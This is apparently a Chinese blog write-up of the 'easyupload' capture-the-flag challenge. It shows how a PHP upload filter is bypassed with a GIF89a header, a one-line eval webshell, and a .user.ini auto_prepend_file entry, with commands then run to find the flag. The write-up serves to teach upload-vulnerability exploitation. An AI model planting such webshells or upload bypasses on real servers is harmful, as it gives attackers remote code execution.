攻防世界: easyupload

攻防世界: easyupload

本次使用到的知识点如下:

  1. .user.ini文件的作用:

    .user.ini 是PHP的用户级配置文件 ,我们可以借助.user.ini轻松让所有php文件都"自动"包含某个文件,而这个文件可以是一个正常php文件,也可以是一个包含一句话的webshell。

    • auto_prepend_file :在每个 PHP 文件开头自动插入另一个文件

    • auto_append_file :在每个 PHP 文件结尾自动插入另一个文件

bash 复制代码
auto_prepend_file = shell.jpg		
auto_append_file = /tmp/evil.php
  1. jepg的文件头部:GIF89a, 可以通过这个文件头部绕过文件内容的检查(网站常规的检查方式包括:前端判断后缀名,前端检查文件头部、后端通过请求头中的content-type, 后端文件名后缀、以及后端检查文件头部的内容
    • 对于前端检查,都可以很容易通过抓包的方式轻易绕过
    • 对于后端的检查,我们只能尽量满足它的需求,后缀检查我们就只能让后缀符合要求,或者文件头部符合要求。

题目描述

题目就两个按钮一个选择文件,另一个提交。

上传文件

由于这个题目是我第一次接触文件上传相关的漏洞,因此我自己尝试了一下就看题解了。

对于文件上传漏洞我总结了下面的思路:

  1. 想办法绕过文件上传的检查,你不能让前端和后端检查到你上传的文件不符合他们的要求,前端一般可以通过抓包改包来绕过,后端则测试其检查的内容,比如是否根据你传递的请求里面的content-type来决定。一般来说可以根据文件后缀、文件头部、content-type, 我们可以考虑从这几个的绕过着手
  2. 找到文件上传后的url连接 ,因为我们上传的文件我们需要让其中的代码被执行,如果上传的是php文件,访问对应的php文件就能够让里面的代码得到执行。本题需要利用配置文件.user.ini将我们上传的木马文件包含到正常的index.php文件中,才能使得我们的代码得到执行。
  3. 访问带木马文件的链接,然后传递我们需要的命令。

首先上传木马文件,文件的内容如下:

bash 复制代码
GIF89a
<?=eval($_GET['test'])?>

其反馈的结果如下图所示,还直接的告诉了我们上传的文件的路径/uploads/xxx!!!

尝试访问该路劲下的php文件,因为我们想要让我们的代码得到执行,直接访问我们上传的图片,php的解析引擎不会觉得我们访问的文件是代码,就不会执行。

如何让index.php包含我们上传的代码

这个就是用到了.user.ini文件的功能了,当服务器配置了这个功能的使用的时候,我们这个配置文件通过下面的配置,可以在每一个当前目录下的php文件的开头处导入我们配置的文件。

bash 复制代码
GIF89a
auto_prepend_file=test.jpg

再次访问index.php,本次访问就会将我们的代码包含

接下来就是传递我们想要执行的命令了!!!

由于前面我们的一句话木马是<?=eval($_GET['test'])?>, 因此我们在get参数中传递我们需要的命令即可,使用ls命令看看是否能执行,结果如下:

使用find命令找到可疑的文件,如下:

查看flag文件,得到结果

相关推荐
刘发财35 分钟前
弃用html2pdf.js,这个html转pdf方案能力是它的几十倍
前端·javascript·github
牛奶3 小时前
2026年大模型怎么选?前端人实用对比
前端·人工智能·ai编程
牛奶3 小时前
前端人为什么要学AI?
前端·人工智能·ai编程
Kagol6 小时前
🎉OpenTiny NEXT-SDK 重磅发布:四步把你的前端应用变成智能应用!
前端·开源·agent
GIS之路7 小时前
ArcGIS Pro 中的 notebook 初识
前端
JavaGuide7 小时前
7 道 RAG 基础概念知识点/面试题总结
前端·后端
ssshooter7 小时前
看完就懂 useSyncExternalStore
前端·javascript·react.js
格砸8 小时前
从入门到辞职|从ChatGPT到OpenClaw,跟上智能时代的进化
前端·人工智能·后端
Live000009 小时前
在鸿蒙中使用 Repeat 渲染嵌套列表,修改内层列表的一个元素,页面不会更新
前端·javascript·react native
柳杉9 小时前
使用Ai从零开发智慧水利态势感知大屏(开源)
前端·javascript·数据可视化